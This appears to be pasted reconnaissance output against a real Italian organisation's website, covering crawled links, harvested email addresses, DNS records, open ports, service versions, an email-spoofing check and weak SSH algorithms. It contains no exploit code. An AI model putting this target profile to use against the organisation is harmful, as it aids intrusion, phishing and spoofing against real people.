  1060. - http://www.granloggiafemminile.it/wp-content/plugins/js_composer/assets/js/js_composer_front.js?ver=4.4.2
  1061. - http://www.granloggiafemminile.it/wp-content/plugins/js_composer/assets/lib/animate-css/animate.css?ver=4.4.2
  1062. - http://www.granloggiafemminile.it/wp-content/plugins/js_composer/assets/lib/flexslider/jquery.flexslider-min.js?ver=4.4.2
  1063. - http://www.granloggiafemminile.it/wp-content/plugins/js_composer/assets/lib/imagesloaded/imagesloaded.pkgd.min.js?ver=4.1.9
  1064. - http://www.granloggiafemminile.it/wp-content/plugins/js_composer/assets/lib/owl-carousel2-dist/assets/owl.carousel.css?ver=4.4.2
  1065. - http://www.granloggiafemminile.it/wp-content/plugins/js_composer/assets/lib/owl-carousel2-dist/assets/owl.theme.default.css?ver=4.4.2
  1066. - http://www.granloggiafemminile.it/wp-content/plugins/js_composer/assets/lib/owl-carousel2-dist/owl.carousel.js?ver=4.4.2
  1067. - http://www.granloggiafemminile.it/wp-content/plugins/js_composer/assets/lib/prettyphoto/css/prettyPhoto.css?ver=4.4.2
  1068. - http://www.granloggiafemminile.it/wp-content/plugins/js_composer/assets/lib/prettyphoto/js/jquery.prettyPhoto.js?ver=4.4.2
  1069. - http://www.granloggiafemminile.it/wp-content/plugins/js_composer/assets/lib/waypoints/waypoints.min.js?ver=4.4.2
  1070. - http://www.granloggiafemminile.it/wp-content/plugins/revslider/rs-plugin/css/settings.css?rev=4.6.0&
  1071. - http://www.granloggiafemminile.it/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?rev=4.6.0&
  1072. - http://www.granloggiafemminile.it/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.tools.min.js?rev=4.6.0&
  1073. - http://www.granloggiafemminile.it/wp-content/plugins/the-events-calendar/resources/tribe-events-full-mobile.min.css?ver=3.9.2
  1074. - http://www.granloggiafemminile.it/wp-content/plugins/the-events-calendar/resources/tribe-events-full.min.css?ver=3.9.2
  1075. - http://www.granloggiafemminile.it/wp-content/plugins/the-events-calendar/resources/tribe-events-theme-mobile.min.css?ver=3.9.2
  1076. - http://www.granloggiafemminile.it/wp-content/plugins/the-events-calendar/resources/tribe-events-theme.min.css?ver=3.9.2
  1077. - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/css/bootstrap.css?ver=4.1.9
  1078. - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/css/footable.core.css?ver=4.1.9
  1079. - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/css/mystyle.css?ver=4.1.9
  1080. - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/js/chosen.jquery.js?ver=4.1.9
  1081. - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/js/footable.filter.js?ver=4.1.9
  1082. - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/js/footable.js?ver=4.1.9
  1083. - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/js/footable.paginate.js?ver=4.1.9
  1084. - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/js/footable.sort.js?ver=4.1.9
  1085. - http://www.granloggiafemminile.it/wp-content/plugins/universefunder/js/jquery.validate.js?ver=4.1.9
  1086. - http://www.granloggiafemminile.it/wp-content/themes/candidate-child/style.css?ver=4.1.9
  1087. - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/bootstrap.min.css?ver=4.1.9
  1088. - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/chosen.css?ver=4.1.9
  1089. - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/cloud-zoom.css?ver=4.1.9
  1090. - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/colorpicker.css?ver=4.1.9
  1091. - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/flexslider.css?ver=4.1.9
  1092. - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/fontello-ie7.css
  1093. - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/fontello.css?ver=4.1.9
  1094. - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/ie.css
  1095. - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/ie9.css
  1096. - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/jackbox-ie8.css
  1097. - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/jackbox-ie9.css
  1098. - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/owl.carousel.css?ver=4.1.9
  1099. - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/responsive-calendar.css?ver=4.1.9
  1100. - http://www.granloggiafemminile.it/wp-content/themes/candidate/css/style1.css?ver=4.1.9
  1101. - http://www.granloggiafemminile.it/wp-content/themes/candidate/fav.ico
  1102. - http://www.granloggiafemminile.it/wp-content/themes/candidate/jackbox/css/jackbox.min.css?ver=4.1.9
  1103. - http://www.granloggiafemminile.it/wp-content/themes/candidate/jackbox/js/jackbox-packed.min.js?ver=4.1.9
  1104. - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/bootstrap.min.js?ver=4.1.9
  1105. - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/chosen.jquery.min.js?ver=4.1.9
  1106. - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/colorpicker.js?ver=4.1.9
  1107. - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/instafeed.min.js?ver=4.1.9
  1108. - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/jflickrfeed.min.js?ver=4.1.9
  1109. - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/jquery-ui-1.10.4.min.js?ver=1.10.4
  1110. - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/jquery.mixitup.js?ver=4.1.9
  1111. - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/jquery.queryloader2.min.js?ver=4.1.9
  1112. - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/jquery.raty.min.js?ver=4.1.9
  1113. - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/main-script.js?ver=4.1.9
  1114. - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/masonry.pkgd.min.js?ver=4.1.9
  1115. - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/modernizr.js?ver=4.1.9
  1116. - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/owl.carousel.min.js?ver=4.1.9
  1117. - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/responsive-calendar.min.js?ver=4.1.9
  1118. - http://www.granloggiafemminile.it/wp-content/themes/candidate/js/zoomsl-3.0.min.js?ver=4.1.9
  1119. - http://www.granloggiafemminile.it/wp-content/themes/candidate/style.css?ver=4.1.9
  1120. - http://www.granloggiafemminile.it/wp-content/themes/candidate/video-js/video-js.css?ver=4.1.9
  1121. - http://www.granloggiafemminile.it/wp-content/themes/candidate/video-js/video.js?ver=4.1.9
  1122. - http://www.granloggiafemminile.it/wp-content/uploads/2015/03/climaf_2.jpg
  1123. - http://www.granloggiafemminile.it/wp-content/uploads/2015/03/slide1.jpg
  1124. - http://www.granloggiafemminile.it/wp-content/uploads/2015/03/slide2.jpg
  1125. - http://www.granloggiafemminile.it/wp-content/uploads/2015/03/slide3.jpg
  1126. - http://www.granloggiafemminile.it/wp-content/uploads/2015/03/slide4.jpg
  1127. - http://www.granloggiafemminile.it/wp-content/uploads/2015/03/unicorno-GLMFI-neg1-150x150.png
  1128. - http://www.granloggiafemminile.it/wp-content/uploads/2015/07/ariuan-immagine-1024x768.jpg
  1129. - http://www.granloggiafemminile.it/wp-content/uploads/2015/07/ariuan-immagine-1140x600.jpg
  1130. - http://www.granloggiafemminile.it/wp-content/uploads/2015/07/ariuan-immagine-263x177.jpg
  1131. - http://www.granloggiafemminile.it/wp-content/uploads/2017/08/gemellaggio2-640x600.jpg
  1132. - http://www.granloggiafemminile.it/wp-content/uploads/2017/08/gemellaggio2.jpg
  1133. - http://www.granloggiafemminile.it/wp-content/uploads/2018/09/logo-GLMFI_477X477.jpg
  1134. - http://www.granloggiafemminile.it/wp-content/uploads/2018/11/images.jpg
  1135. - http://www.granloggiafemminile.it/wp-content/uploads/2019/03/Libro-bomb_Pavan_477x477-263x177.jpg
  1136. - http://www.granloggiafemminile.it/wp-content/uploads/2019/03/Libro-bomb_Pavan_477x477-477x335.jpg
  1137. - http://www.granloggiafemminile.it/wp-content/uploads/2019/03/Libro-bomb_Pavan_477x477.jpg
  1138. - http://www.granloggiafemminile.it/wp-content/uploads/2019/03/acacia-in-fiore.jpg
  1139. - http://www.granloggiafemminile.it/wp-content/uploads/2019/09/IMMAGINE-CONVENTO-01-1012x1024.jpg
  1140. - http://www.granloggiafemminile.it/wp-content/uploads/2019/09/IMMAGINE-CONVENTO-01-1140x600.jpg
  1141. - http://www.granloggiafemminile.it/wp-content/uploads/2019/09/IMMAGINE-CONVENTO-01-263x177.jpg
  1142. - http://www.granloggiafemminile.it/wp-content/uploads/2019/09/violenza-sulle-donne-L-xTpPSi-002-263x177.jpg
  1143. - http://www.granloggiafemminile.it/wp-content/uploads/2019/09/violenza-sulle-donne-L-xTpPSi-002.jpg
  1144. - http://www.granloggiafemminile.it/wp-includes/js/comment-reply.min.js?ver=4.1.9
  1145. - http://www.granloggiafemminile.it/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
  1146. - http://www.granloggiafemminile.it/wp-includes/js/jquery/jquery.form.min.js?ver=3.37.0
  1147. - http://www.granloggiafemminile.it/wp-includes/js/jquery/jquery.js?ver=1.11.1
  1148. - http://www.granloggiafemminile.it/wp-includes/js/jquery/ui/core.min.js?ver=1.11.2
  1149. - http://www.granloggiafemminile.it/wp-includes/js/jquery/ui/datepicker.min.js?ver=1.11.2
  1150. - http://www.granloggiafemminile.it/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.2
  1151. - http://www.granloggiafemminile.it/wp-includes/js/jquery/ui/slider.min.js?ver=1.11.2
  1152. - http://www.granloggiafemminile.it/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.2
  1153. - http://www.granloggiafemminile.it/wp-includes/js/underscore.min.js?ver=1.6.0
  1154. - http://www.granloggiafemminile.it/wp-includes/wlwmanifest.xml
  1155. - http://www.granloggiafemminile.it/xmlrpc.php
  1156. - http://www.granloggiafemminile.it/xmlrpc.php?rsd
  1157. Total external links: 184
  1158.  
  1159. + Email addresses found:
  1160. Total email address found: 0
  1161.  
  1162. + Directories found:
  1163. - http://www.granloggiafemminile.it./category/ (404 Not Found)
  1164. - http://www.granloggiafemminile.it./category/notizie/
  1165. - http://www.granloggiafemminile.it./category/notizie/js/
  1166. - http://www.granloggiafemminile.it./contatti/
  1167. - http://www.granloggiafemminile.it./contatti/js/
  1168. - http://www.granloggiafemminile.it./glossario/
  1169. - http://www.granloggiafemminile.it./glossario/js/
  1170. - http://www.granloggiafemminile.it./i-nostri-principi/
  1171. - http://www.granloggiafemminile.it./i-nostri-principi/js/
  1172. - http://www.granloggiafemminile.it./il-nostro-calendario-eventi/
  1173. - http://www.granloggiafemminile.it./il-nostro-calendario-eventi/js/
  1174. - http://www.granloggiafemminile.it./js/
  1175. - http://www.granloggiafemminile.it./le-logge/
  1176. - http://www.granloggiafemminile.it./le-logge/js/
  1177. - http://www.granloggiafemminile.it./www.granloggiafemminile.it/ (404 Not Found)
  1178. - http://www.granloggiafemminile.it./www.granloggiafemminile.it/wp-content/ (404 Not Found)
  1179. - http://www.granloggiafemminile.it./www.granloggiafemminile.it/wp-content/plugins/ (404 Not Found)
  1180. - http://www.granloggiafemminile.it./www.granloggiafemminile.it/wp-content/plugins/woocommerce/ (404 Not Found)
  1181. - http://www.granloggiafemminile.it./www.granloggiafemminile.it/wp-content/plugins/woocommerce/assets/ (404 Not Found)
  1182. - http://www.granloggiafemminile.it./www.granloggiafemminile.it/wp-content/plugins/woocommerce/assets/js/ (404 Not Found)
  1183. - http://www.granloggiafemminile.it./www.granloggiafemminile.it/wp-content/plugins/woocommerce/assets/js/frontend/ (404 Not Found)
  1184. - http://www.granloggiafemminile.it./www.granloggiafemminile.it/wp-content/plugins/woocommerce/assets/js/jquery-blockui/
  1185. - http://www.granloggiafemminile.it./www.granloggiafemminile.it/wp-content/plugins/woocommerce/assets/js/jquery-cookie/
  1186. Total directories: 23
  1187.  
  1188. + Directory indexing found:
  1189. Total directories with indexing: 0
  1190.  
  1191. ----------------------------------------------------------------------
  1192.  
  1193.  
  1194. + URL to crawl: https://www.granloggiafemminile.it.
  1195. + Date: 2019-09-25
  1196.  
  1197. + Crawling URL: https://www.granloggiafemminile.it.:
  1198. + Links:
  1199. + Crawling https://www.granloggiafemminile.it.
  1200. + Searching for directories...
  1201. + Searching open folders...
  1202.  
  1203.  
  1204. + URL to crawl: http://pop.granloggiafemminile.it.
  1205. + Date: 2019-09-25
  1206.  
  1207. + Crawling URL: http://pop.granloggiafemminile.it.:
  1208. + Links:
  1209. + Crawling http://pop.granloggiafemminile.it.
  1210. + Searching for directories...
  1211. - Found: http://pop.granloggiafemminile.it./js/
  1212. - Found: http://pop.granloggiafemminile.it./js/vendor/
  1213. - Found: http://pop.granloggiafemminile.it./css/
  1214. - Found: http://pop.granloggiafemminile.it./css/qbert_theme/
  1215. - Found: http://pop.granloggiafemminile.it./css/qbert_theme/template/
  1216. - Found: http://pop.granloggiafemminile.it./css/vendor/
  1217. - Found: http://pop.granloggiafemminile.it./css/vendor/font-awesome-4.4.0/
  1218. - Found: http://pop.granloggiafemminile.it./css/vendor/font-awesome-4.4.0/css/
  1219. + Searching open folders...
  1220. - http://pop.granloggiafemminile.it./js/ (403 Forbidden)
  1221. - http://pop.granloggiafemminile.it./js/vendor/ (403 Forbidden)
  1222. - http://pop.granloggiafemminile.it./css/ (403 Forbidden)
  1223. - http://pop.granloggiafemminile.it./css/qbert_theme/ (403 Forbidden)
  1224. - http://pop.granloggiafemminile.it./css/qbert_theme/template/ (403 Forbidden)
  1225. - http://pop.granloggiafemminile.it./css/vendor/ (403 Forbidden)
  1226. - http://pop.granloggiafemminile.it./css/vendor/font-awesome-4.4.0/ (403 Forbidden)
  1227. - http://pop.granloggiafemminile.it./css/vendor/font-awesome-4.4.0/css/ (403 Forbidden)
  1228.  
  1229.  
  1230. + URL to crawl: http://mail.register.it
  1231. + Date: 2019-09-25
  1232.  
  1233. + Crawling URL: http://mail.register.it:
  1234. + Links:
  1235. + Crawling http://mail.register.it
  1236. + Searching for directories...
  1237. + Searching open folders...
  1238.  
  1239.  
  1240. + URL to crawl: https://pop.granloggiafemminile.it.
  1241. + Date: 2019-09-25
  1242.  
  1243. + Crawling URL: https://pop.granloggiafemminile.it.:
  1244. + Links:
  1245. + Crawling https://pop.granloggiafemminile.it.
  1246. + Searching for directories...
  1247. + Searching open folders...
  1248.  
  1249.  
  1250. + URL to crawl: https://mail.register.it
  1251. + Date: 2019-09-25
  1252.  
  1253. + Crawling URL: https://mail.register.it:
  1254. + Links:
  1255. + Crawling https://mail.register.it
  1256. + Searching for directories...
  1257. + Searching open folders...
  1258.  
  1259. --Finished--
  1260. Summary information for domain granloggiafemminile.it.
  1261. -----------------------------------------
  1262. Domain Specific Information:
  1263. Email: maat@granloggiafemminile.it&
  1264. Email: demetra@granloggiafemminile.it&
  1265. Email: aldebaran@granloggiafemminile.it&
  1266. Email: laconcordia@granloggiafemminile.it&
  1267. Email: ipathya@granloggiafemminile.it&
  1268. Email: gm@granloggiafemminile.it.
  1269. Email: posta@granloggiafemminile.it
  1270. Email: gm@granloggiafemminile.it
  1271. Email: iside@granloggiafemminile.it.
  1272. Email: portadelsole@granloggiafemminile.it&
  1273. Email: astarte@granloggiafemminile.it&
  1274. Email: europa@granloggiafemminile.it&
  1275.  
  1276. Domain Ips Information:
  1277. IP: 195.110.124.140
  1278. HostName: ns1.register.it Type: NS
  1279. HostName: ns1.register.it Type: PTR
  1280. Country: Italy
  1281. Is Active: True (reset ttl 64)
  1282. Port: 53/tcp open domain syn-ack ttl 50 PowerDNS Authoritative Server 4.1.13
  1283. Script Info: | dns-nsid:
  1284. Script Info: | NSID: dupre09 (64757072653039)
  1285. Script Info: | id.server: dupre09
  1286. Script Info: |_ bind.version: PowerDNS Authoritative Server 4.1.13 (built Aug 8 2019 08:51:12 by root@1cdf8496be4c)
  1287. IP: 77.238.18.215
  1288. HostName: www.granloggiafemminile.it. Type: A
  1289. Country: Italy
  1290. Is Active: True (reset ttl 64)
  1291. Port: 21/tcp open ftp syn-ack ttl 46 ProFTPD 1.3.4a
  1292. Port: 22/tcp open ssh syn-ack ttl 46 OpenSSH 6.0p1 Debian 4+deb7u6 (protocol 2.0)
  1293. Script Info: | ssh-hostkey:
  1294. Script Info: | 1024 bf:7d:fc:6b:bb:a4:d2:d5:3a:f6:4f:93:90:8a:cc:c7 (DSA)
  1295. Script Info: | 2048 97:d9:57:28:3e:87:a5:22:b6:fb:f8:e2:14:dc:d1:70 (RSA)
  1296. Script Info: |_ 256 1a:a7:fd:2d:ee:01:c3:eb:58:df:25:5f:fb:44:66:f1 (ECDSA)
  1297. Port: 80/tcp open http syn-ack ttl 46 nginx 1.6.2
  1298. Script Info: | http-methods:
  1299. Script Info: |_ Supported Methods: GET HEAD
  1300. Script Info: |_http-server-header: nginx/1.6.2
  1301. Script Info: |_http-title: Site doesn't have a title (text/html).
  1302. Port: 443/tcp open ssl/http syn-ack ttl 46 nginx 1.6.2
  1303. Script Info: | http-methods:
  1304. Script Info: |_ Supported Methods: HEAD POST
  1305. Script Info: |_http-server-header: nginx/1.6.2
  1306. Script Info: |_http-title: Did not follow redirect to https://www.alladv.it/
  1307. Script Info: | ssl-cert: Subject: commonName=www.alladv.it
  1308. Script Info: | Subject Alternative Name: DNS:www.alladv.it, DNS:alladv.it
  1309. Script Info: | Issuer: commonName=RapidSSL RSA CA 2018/organizationName=DigiCert Inc/countryName=US
  1310. Script Info: | Public Key type: rsa
  1311. Script Info: | Public Key bits: 2048
  1312. Script Info: | Signature Algorithm: sha256WithRSAEncryption
  1313. Script Info: | Not valid before: 2019-02-11T00:00:00
  1314. Script Info: | Not valid after: 2020-03-12T12:00:00
  1315. Script Info: | MD5: 5ab7 d878 259a 98b4 11ee 4745 d727 f5e9
  1316. Script Info: |_SHA-1: e697 b089 d7b7 5f1e cdc6 d07a f1ab 7d9b 4a38 4559
  1317. Script Info: |_ssl-date: TLS randomness does not represent time
  1318. Script Info: | tls-nextprotoneg:
  1319. Script Info: |_ http/1.1
  1320. Os Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
  1321. IP: 195.110.124.132
  1322. HostName: mail.register.it Type: MX
  1323. HostName: mail.register.it Type: PTR
  1324. HostName: pop.granloggiafemminile.it. Type: A
  1325. Country: Italy
  1326. Is Active: True (reset ttl 64)
  1327. Port: 80/tcp open http syn-ack ttl 241 nginx 1.6.2
  1328. Script Info: |_http-favicon: Unknown favicon MD5: 2C0E16E117EEC1ACCCD030B8FAABE7A8
  1329. Script Info: | http-methods:
  1330. Script Info: |_ Supported Methods: GET HEAD
  1331. Script Info: |_http-title: Not configured webmail
  1332. Port: 110/tcp open pop3 syn-ack ttl 50 Dovecot pop3d
  1333. Script Info: |_pop3-capabilities: UIDL SASL(PLAIN) AUTH-RESP-CODE RESP-CODES USER TOP CAPA PIPELINING
  1334. Port: 143/tcp open imap syn-ack ttl 49 Dovecot imapd
  1335. Script Info: |_imap-capabilities: LITERAL+ more have OK ID ENABLE IMAP4rev1 AUTH=PLAINA0001 SASL-IR post-login Pre-login capabilities LOGIN-REFERRALS listed IDLE
  1336. Port: 443/tcp open ssl/http syn-ack ttl 241 nginx 1.6.2
  1337. Script Info: |_http-favicon: Unknown favicon MD5: 2C0E16E117EEC1ACCCD030B8FAABE7A8
  1338. Script Info: | http-methods:
  1339. Script Info: |_ Supported Methods: GET HEAD
  1340. Script Info: |_http-title: Not configured webmail
  1341. Script Info: | ssl-cert: Subject: commonName=webmail.register.it/organizationName=Register.it S.p.A./stateOrProvinceName=Firenze/countryName=IT
  1342. Script Info: | Subject Alternative Name: DNS:webmail.register.it
  1343. Script Info: | Issuer: commonName=Thawte EV RSA CA 2018/organizationName=DigiCert Inc/countryName=US
  1344. Script Info: | Public Key type: rsa
  1345. Script Info: | Public Key bits: 2048
  1346. Script Info: | Signature Algorithm: sha256WithRSAEncryption
  1347. Script Info: | Not valid before: 2018-10-03T00:00:00
  1348. Script Info: | Not valid after: 2019-10-03T12:00:00
  1349. Script Info: | MD5: 02c4 45b6 cd89 e781 009e 81a0 5071 747b
  1350. Script Info: |_SHA-1: 70f5 0853 2f51 4467 ed2b a225 5690 d36b a582 c5ca
  1351. Port: 993/tcp open ssl/imaps? syn-ack ttl 241
  1352. Script Info: |_ssl-date: TLS randomness does not represent time
  1353. Port: 995/tcp open ssl/pop3s? syn-ack ttl 241
  1354. Script Info: |_ssl-date: TLS randomness does not represent time
  1355. Script Info: Device type: general purpose|load balancer
  1356. IP: 195.7.227.1
  1357. HostName: ns2.register.it Type: NS
  1358. HostName: ns2.register.it Type: PTR
  1359. Country: United Kingdom
  1360. Is Active: True (reset ttl 64)
  1361. Port: 53/tcp open domain syn-ack ttl 51 PowerDNS Authoritative Server 4.1.13
  1362. Script Info: | dns-nsid:
  1363. Script Info: | NSID: dupre16 (64757072653136)
  1364. Script Info: | id.server: dupre16
  1365. Script Info: |_ bind.version: PowerDNS Authoritative Server 4.1.13 (built Aug 8 2019 08:51:12 by root@1cdf8496be4c)
  1366. ######################################################################################################################################
  1367. dnsenum VERSION:1.2.4
  1368.  
  1369. ----- www.granloggiafemminile.it -----
  1370.  
  1371.  
  1372. Host's addresses:
  1373. __________________
  1374.  
  1375. granloggiafemminile.it. 863 IN A 77.238.18.215
  1376.  
  1377.  
  1378. Name Servers:
  1379. ______________
  1380.  
  1381. ns2.register.it. 10428 IN A 195.7.227.1
  1382. ns1.register.it. 9544 IN A 195.110.124.140
  1383.  
  1384.  
  1385. Mail (MX) Servers:
  1386. ___________________
  1387.  
  1388. mail.register.it. 68761 IN A 195.110.124.132
  1389.  
  1390.  
  1391. Trying Zone Transfers and getting Bind Versions:
  1392. _________________________________________________
  1393.  
  1394.  
  1395. Trying Zone Transfer for www.granloggiafemminile.it on ns2.register.it ...
  1396.  
  1397. Trying Zone Transfer for www.granloggiafemminile.it on ns1.register.it ...
  1398.  
  1399. brute force file not specified, bay.
  1400. ######################################################################################################################################
  1401. [+] www.granloggiafemminile.it has no SPF record!
  1402. [*] No DMARC record found. Looking for organizational record
  1403. [+] No organizational DMARC record
  1404. [+] Spoofing possible for www.granloggiafemminile.it!
  1405. ######################################################################################################################################
  1406. Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-25 11:25 EDT
  1407. Nmap scan report for www.granloggiafemminile.it (77.238.18.215)
  1408. Host is up (0.15s latency).
  1409. rDNS record for 77.238.18.215: host1.4marketing.it
  1410. Not shown: 384 filtered ports, 97 closed ports
  1411. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  1412. PORT STATE SERVICE
  1413. 22/tcp open ssh
  1414. 443/tcp open https
  1415.  
  1416. Nmap done: 1 IP address (1 host up) scanned in 13.96 seconds
  1417. #######################################################################################################################################
  1418. # general
  1419. (gen) banner: SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u6
  1420. (gen) software: OpenSSH 6.0p1
  1421. (gen) compatibility: OpenSSH 5.9-6.0, Dropbear SSH 2013.62+ (some functionality from 0.52)
  1422. (gen) compression: enabled (zlib@openssh.com)
  1423.  
  1424. # key exchange algorithms
  1425. (kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
  1426. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  1427. (kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
  1428. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  1429. (kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
  1430. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  1431. (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
  1432. `- [info] available since OpenSSH 4.4
  1433. (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1434. `- [warn] using weak hashing algorithm
  1435. `- [info] available since OpenSSH 2.3.0
  1436. (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
  1437. `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
  1438. (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1439. `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
  1440. `- [warn] using small 1024-bit modulus
  1441. `- [warn] using weak hashing algorithm
  1442. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
  1443.  
  1444. # host-key algorithms
  1445. (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
  1446. (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
  1447. `- [warn] using small 1024-bit modulus
  1448. `- [warn] using weak random number generator could reveal the key
  1449. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  1450. (key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
  1451. `- [warn] using weak random number generator could reveal the key
  1452. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  1453.  
  1454. # encryption algorithms (ciphers)
  1455. (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  1456. (enc) aes192-ctr -- [info] available since OpenSSH 3.7
  1457. (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  1458. (enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1459. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  1460. `- [warn] using weak cipher
  1461. `- [info] available since OpenSSH 4.2
  1462. (enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1463. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  1464. `- [warn] using weak cipher
  1465. `- [info] available since OpenSSH 4.2
  1466. (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1467. `- [warn] using weak cipher mode
  1468. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
  1469. (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1470. `- [warn] using weak cipher
  1471. `- [warn] using weak cipher mode
  1472. `- [warn] using small 64-bit block size
  1473. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
  1474. (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1475. `- [fail] disabled since Dropbear SSH 0.53
  1476. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  1477. `- [warn] using weak cipher mode
  1478. `- [warn] using small 64-bit block size
  1479. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
  1480. (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1481. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  1482. `- [warn] using weak cipher mode
  1483. `- [warn] using small 64-bit block size
  1484. `- [info] available since OpenSSH 2.1.0
  1485. (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1486. `- [warn] using weak cipher mode
  1487. `- [info] available since OpenSSH 2.3.0
  1488. (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1489. `- [warn] using weak cipher mode
  1490. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
  1491. (enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1492. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  1493. `- [warn] using weak cipher
  1494. `- [info] available since OpenSSH 2.1.0
  1495. (enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1496. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  1497. `- [warn] using weak cipher mode
  1498. `- [info] available since OpenSSH 2.3.0
  1499.  
  1500. # message authentication code algorithms
  1501. (mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1502. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  1503. `- [warn] using encrypt-and-MAC mode
  1504. `- [warn] using weak hashing algorithm
  1505. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  1506. (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
  1507. `- [warn] using weak hashing algorithm
  1508. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  1509. (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
  1510. `- [warn] using small 64-bit tag size
  1511. `- [info] available since OpenSSH 4.7
  1512. (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
  1513. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  1514. (mac) hmac-sha2-256-96 -- [fail] removed since OpenSSH 6.1, removed from specification
  1515. `- [warn] using encrypt-and-MAC mode
  1516. `- [info] available since OpenSSH 5.9
  1517. (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
  1518. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  1519. (mac) hmac-sha2-512-96 -- [fail] removed since OpenSSH 6.1, removed from specification
  1520. `- [warn] using encrypt-and-MAC mode
  1521. `- [info] available since OpenSSH 5.9
  1522. (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  1523. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
